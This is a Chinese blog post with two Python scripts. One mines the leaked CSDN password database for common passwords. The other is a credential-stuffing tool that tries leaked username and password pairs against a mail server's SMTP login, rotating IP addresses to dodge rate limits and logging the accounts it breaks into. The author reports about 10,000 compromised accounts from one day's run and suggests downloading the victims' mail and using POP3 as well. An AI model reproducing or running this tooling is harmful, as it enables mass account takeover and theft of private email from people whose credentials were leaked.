好吧,本来就是比较邪恶之物,看的懂的同学就看呗.手痒编辑了一下,高手请略过^_^
'''
@file: PswList_Csdn.py
@auth: GaA.Ra
@date: 2011.12.23
@ver : Python3.2
'''
g_ResultList = []
def AnalyzeData():
global g_ResultList
print(' [*] Begin to Analyze Password...')
fileDB = open('www.youkuaiyun.com.sql', 'rb')
analyzeResult = {}
for dbRecord in fileDB:
acountData = dbRecord.strip().split(b' # ')
password = acountData[1]
try:
countPwd = analyzeResult[password]
countPwd[0] += 1
analyzeResult[password] = countPwd
except KeyError:
analyzeResult[password] = [1, password]
g_ResultList = sorted(analyzeResult.values(), reverse = True)
print(' [*] All Done...')
def SaveResult():
global g_ResultList
print(' [*] Begin to Save Result...')
fileResult = open('PasswordList-Csdn.txt', 'w')
for result in g_ResultList:
try:
if result[0] > 2:
print(result[1].decode(), str(result[0]), file = fileResult)
except UnicodeEncodeError:
continue
except UnicodeDecodeError:
continue
print(' [*] All Done...')
if __name__ == '__main__':
AnalyzeData()
SaveResult()
'''
@file: MailSpider.py
@auth: GaA.Ra
@date: 2011.12.23
@ver : Python3.2
For LinuxOS only, BackTrack5 Best
'''
import os
import sys
from os.path import isfile
from smtplib import SMTP
from smtplib import SMTPAuthenticationError as AuthError
from smtplib import SMTPConnectError as ConnError
g_WorkingPath = os.getcwd()
g_ResultDBName = 'Result'
g_ResultCount = 1
g_TryIndex = 0
g_MailDBName = 'Data'
g_MailDBList = None
# not all mail site support smtp
g_MailServer = 'smtp.xxx.com'
# using ur own gateway
g_GateWay = '192.168.1.1'
g_IPCount = 0
g_IPList = []
def Init():
global g_ResultDBName
print(' MailSpider0.1 GaA.Ra ')
if not isfile(g_ResultDBName):
file = open(g_ResultDBName, 'w')
file.close()
GetIPList()
GetMailDBList()
def PrintError(Message):
print(' [!] ' + Message)
def PrintStatus(Message):
print(' [*] ' + Message)
def ChangeIP(IP):
global g_GateWay
PrintStatus('Changing IP...' + IP)
if g_GateWay == None:
g_GateWay = input(' [*] GateWay: ')
ret1 = os.system('ifconfig eth0 down')
ret2 = os.system('ifconfig eth0 ' + IP + ' netmask 255.255.255.0 up')
ret3 = os.system('route add default gw ' + g_GateWay)
if ret1 !=0 or ret2 !=0 or ret3 != 0:
PrintError('ChangeIP Error...')
def GetIP():
global g_IPCount
global g_IPList
if g_IPCount < len(g_IPList):
IP = g_IPList[g_IPCount].strip()
g_IPCount += 1
return IP
else:
PrintError('Out of ip address...')
return None
def GetIPList():
global g_GateWay
ret = os.system('nmap -p 80 -PR ' + g_GateWay + '/24 | grep report > result.txt')
if ret != 0:
PrintError('Nmap Scan Error...')
resultSet = set()
scanResult = open('result.txt', 'r')
for line in scanResult:
line = line.strip()
line = line.split(' ')[-1]
line = line.split('.')[-1]
resultSet.add(line)
scanResult.close()
os.system('rm result.txt')
for x in range(1, 255):
x = str(x)
if x not in resultSet:
x = g_GateWay[0:g_GateWay.rfind('.') + 1] + x
g_IPList.append(x)
def GetMailDBList():
global g_MailDBList
global g_MailDBName
mailDBFile = open(g_MailDBName, 'rb')
g_MailDBList = mailDBFile.readlines()
def TryLogin(Index, User, Pass, ResultFile):
global g_ResultCount
global g_MailServer
try:
mailServer = SMTP(g_MailServer)
print(' [*] Try Login: ',Index, User, Pass, end = '')
mailServer.login(User, Pass)
print(' --> Success...')
print('%05d user: %s password: %s' % (g_ResultCount, User, Pass), file = ResultFile)
mailServer.quit()
return True
except AuthError:
print(' ')
mailServer.quit()
return False
except KeyboardInterrupt:
PrintStatus('User Exiting...')
ResultFile.flush()
ResultFile.close()
sys.exit()
def MailSpider():
global g_ResultDBName
global g_MailDBName
global g_ResultCount
global g_MailDBList
global g_TryIndex
resultFile = open(g_ResultDBName, 'a')
for tryIndex in range(0, len(g_MailDBList)):
try:
acountData = g_MailDBList[g_TryIndex].decode().strip().split(' ')
userName = acountData[0]
passWord = acountData[1]
except IndexError:
return True
except UnicodeDecodeError:
print('UnicodeDecodeError...Continue...')
g_TryIndex += 1
continue
try:
trySuccess = TryLogin(g_TryIndex, userName, passWord, resultFile)
if trySuccess == True:
g_ResultCount += 1
else:
pass
g_TryIndex += 1
except ConnError:
resultFile.flush()
resultFile.close()
return False
return True
def Run():
Init()
while True:
IP = GetIP()
if IP == None:
break
else:
ChangeIP(IP)
try:
finish = MailSpider()
except KeyboardInterrupt:
return
except:
print('May be IP crash or Connect timeout...Continue...')
if finish:
PrintStatus('All Done...')
return
if __name__ == '__main__':
Run()PswList是统计弱密码的,出现3次以上的就记录下来.这个字典也算是有16w条.
MailSpider切换IP对于拥有独立IP的同学来说比较方便,我是校园网,而且学校这边是独立IP,SO...切换IP主要是某些服务器会对IP连接的最大次数进行限制.
nmap扫描主要是用ARP扫出所在网段的存活主机,grep得到存活主机所在的结果,过滤一下(利用set集合操作)得到可以切的IP,存起来.切IP用的是ifconfig和route两个命令.某数字邮箱服务器大概在700+次连接的时候会提示IP连接次数过多,拒绝连接请求,人肉测试大概受限期是1个小时左右(吃个饭回来看多一集好汉两个半就过去了- -)
一天(12个小时),在实验室那边,网络时好时坏的,大概干了30000条数据,成功率大概是20%左右(好吧,我收集到大概10000条数据),觉得也就这样了,大家不要拿来做坏事啵.或许可以写个脚本把邮件都down下来本地然后进行数据挖掘.需要的只是时间而已.
PS:除了SMTP协议,POP3协议都可以拿来XXX,不过POP3协议的速度比SMTP慢大概10倍(非精确值),聪明的同学你懂的^ ^
扫一扫
775
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
